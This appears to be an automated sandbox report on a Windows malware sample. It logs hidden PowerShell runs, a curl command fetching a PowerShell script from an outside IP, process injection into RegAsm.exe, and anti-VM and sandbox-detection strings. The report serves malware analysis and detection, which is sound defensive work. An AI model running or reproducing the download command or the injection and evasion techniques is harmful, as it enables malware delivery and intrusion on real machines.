                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4938Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4219Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5723Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3870Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6786Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep count: 5723 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep count: 3870 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2356Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3172Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6528Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
                  Source: RegAsm.exe, 00000009.00000002.4597271061.00000000056F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
                  Source: RegAsm.exe, 00000009.00000002.4580697643.00000000013D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: powershell.exe, 00000000.00000002.2191223685.0000027EC2424000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2351616241.0000029DF41E8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.2170559725.000001E268D35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: sfqbr.ps1, type: SAMPLE
                  Source: Yara matchFile source: amsi64_4980.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_4016.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: 5.2.powershell.exe.29df4120000.13.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
                  Source: 5.2.powershell.exe.29df4120000.13.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
                  Source: 5.2.powershell.exe.29df4120000.13.raw.unpack, ClasserPlus.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.0.csJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 700000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 702000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E8A008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES617A.tmp" "c:\Users\user\AppData\Local\Temp\nfy3200k\CSCAAE263D2780F40D49B69A6171B4A2D61.TMP"Jump to behavior
                  Source: RegAsm.exe, 00000009.00000002.4582340011.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.000000000335D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.00000000032EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ProgMan
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!SHELLDLL_DefView
                  Source: RegAsm.exe, 00000009.00000002.4582340011.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.0000000003443000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.000000000332F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                  Source: RegAsm.exe, 00000009.00000002.4582340011.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.000000000335D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.00000000032EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
